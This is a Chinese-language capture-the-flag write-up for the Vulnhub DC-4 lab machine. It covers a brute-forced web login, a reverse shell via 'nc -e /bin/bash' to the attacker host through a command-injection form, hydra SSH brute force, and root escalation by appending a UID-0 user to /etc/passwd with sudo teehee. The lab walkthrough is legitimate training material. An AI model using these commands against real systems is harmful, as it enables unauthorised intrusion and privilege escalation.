freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub--DC-4
CNjuzi 2022-12-20 18:19:14 113636
所属地 宁夏

Vulnhub--DC-4

一,部署方法

  1. 在官网上下载zip压缩包
  2. 下载到本地上解压缩后使用虚拟机导入.ova后缀的文件(在过程中出现问题不用理睬,点击重试即可)
  3. 配置网络,本人设置的是nat模式,这个看个人需求
  4. 打开靶机即可

二,靶机地址和描述

  1. 下载地址

https://download.vulnhub.com/dc/DC-4.zip

  1. 靶机描述

1671531224_63a18ad8829123035a6f8.png!small?1671531224404

靶机只有一个flag

三,测试

1. 信息收集

arp-scan -l

1671531236_63a18ae40fba9264c3cf2.png!small?1671531243848

本机攻击机地址是148,192.168.237.147为靶机地址

使用nmap对靶机全面扫描

nmap -A -T4 -p- 192.168.237.147

1671531243_63a18aeb41ecf46e8c4ce.png!small?1671531243848

发现靶机开了两个端口

22端口,ssh服务

80端口,http,web服务

访问192.168.237.147网站

1671531249_63a18af1f196b64303b93.png!small?1671531250052

再进行目录爆破

1671531263_63a18aff93448d2ff332f.png!small?1671531263651

均无任何收获!!!

还是尝试从web页面进行深入

点击登录框发现存有用户名admin,输入密码123使用BP进行抓包查看

1671531270_63a18b060c48eb7adbe26.png!small?1671531269983

发现用户名和密码是以明文进行传输的。

这里尝试爆破密码,爆破出来是happy

使用用户名/密码:admin/happy,成功登录

1671531277_63a18b0d2493d5a5e552e.png!small?1671531277057

点击Command进入

1671531282_63a18b1296a08a3a00d98.png!small?1671531282701

点击run

1671531290_63a18b1a6863395b93cba.png!small?1671531290391

发现执行了命令,列出了当前目录下的文件

再次点击run,这时使用bp抓包

1671531298_63a18b2218a7d5a25e336.png!small?1671531297956

这才发现执行了命令ls -l

这里可以使用命令执行漏洞,既然可以使用命令执行漏洞,于是下一步反弹shell

2. 反弹shell

首先在kali开启监听

nc -lvvp 4444

1671531309_63a18b2d87330435ed05e.png!small?1671531309365

其次在抓包页面命令执行处执行以下命令

nc -e /bin/bash 192.168.237.148 4444

1671531317_63a18b3528922230372df.png!small?1671531317119

查看kali的监听页面,成功监听

1671531322_63a18b3a4cdaf52b67fd7.png!small?1671531322174

执行命令查看当前权限

whoami

1671531330_63a18b42c16c67d1f2f6a.png!small?1671531330631

是最低权限。

3. python执行交互性shell

执行

python -c "import pty;pty.spawn('/bin/bash')"

1671531339_63a18b4b1b8edd9fda732.png!small?1671531338900

4.靶机内信息收集

当前得到的是最低用户,尝试进行提权操作。

这里使用命令

find / -perm -u=s -type f 2>/dev/null

查看可使用的suid的命令

1671531355_63a18b5b07e2559cf59dd.png!small?1671531356408

并无可用文件,倒是最后一个有点意思,进行查看/home目录下

1671531359_63a18b5f8b234a15960f4.png!small?1671531359359

发现三个用户文件夹,进行逐一查看,发现只有在jim目录下存在文件

1671531365_63a18b65a36bbe6b6accb.png!small?1671531365468

经过信息的寻找,在jim目录下的backups文件夹内有password文件

1671531371_63a18b6b6371b6a2e27ac.png!small?1671531371145

进行查看

1671531375_63a18b6f9f7ddd29eecce.png!small?1671531375587

把文件内的密码复制保存出来,目录下的mbox没有访问权限,而test.sh里面是一些无用的东西

1671531380_63a18b74ce3fa9875bd88.png!small?1671531380897

信息整理:

到这掌握的信息有:靶机有三个普通用户,得到jim用户下的有一个密码字典,在前面的信息收集中得到靶机开启ssh服务,这时可以使用得到的密码字典爆破登录ssh服务,同时mbox无权限访问,有嫌疑!

4. 使用hydra爆破ssh服务

hydra -l jim -P pass.txt 192.168.237.147 ssh

1671531397_63a18b853470d5eeec0b9.png!small?1671531397453

成功爆破密码,使用ssh服务进行登录

ssh jim@192.168.237.147

1671531406_63a18b8e167898b70d565.png!small?1671531406026

查看用户权限,并查看mbox内容

whoami

ls

cat mbox

1671531417_63a18b99198a7bab60b62.png!small?1671531417158

这里显示是root用户给jim发了一封邮件

想到在linux mail文件夹下可能会存在文件,进入/var/mail文件夹内查看

cd /var/mail

ls

1671531432_63a18ba8a8da563583f35.png!small?1671531432481

查看文件

1671531439_63a18baf12bbd7c2f2d4e.png!small?1671531439254

这时charles用户发给jim用户的,在其中包含了charles用户的密码

使用charles用户进行ssh登录

ssh charles@192.168.237.147

1671531451_63a18bbb87c3c515fe417.png!small?1671531451643

查看用户下的线索,发现并无线索,再次尝试提权

5. 提权

sudo -l

查看特权命令

1671531459_63a18bc370a96fe15f3fa.png!small?1671531459331

发现存在root下的命令teehee

teehee --help

查看你teehee命令的使用方法

1671531466_63a18bca8345204c3c11a.png!small?1671531467125

这是一个写入文件的命令

可以使用这个命令进行写入高权限的用户。

“用户名:密码:用户ID:组ID:用户说明:家目录:登陆后的shell”| 使用命令 -a 文件保存路径

echo “HK::0:0:::/bin/bash” | sudo teehee -a /etc/passwd

切换用户

su HK

查看当前用户权限

whoami

1671531482_63a18bda87958d548258b.png!small?1671531482749

成功提权,获得最高权限

寻找flag

cd /root

ls

cat flag.txt

1671531491_63a18be35c6fc628c1aee.png!small?1671531491671

成功解题

四.总结

1.信息收集

2.登录框的爆破

3.命令执行漏洞

4.hydra工具的使用

5.ssh服务

6.sudo提权

# 渗透测试 # 网络安全 # 漏洞分析 # VulnHub # vulnhub靶机
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 CNjuzi 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
vulnhub实战打靶系列
CNjuzi LV.5
欢迎关注公众号:HK安全小屋。公众号内定期更新网络安全方面的知识和心得!!
  • 18 文章数
  • 7 关注者
InfoSecWarrior CTF 2020: 01
2023-07-16
LAMPSecurity: CTF5
2023-03-28
LAMPSecurity: CTF4
2023-03-22
文章目录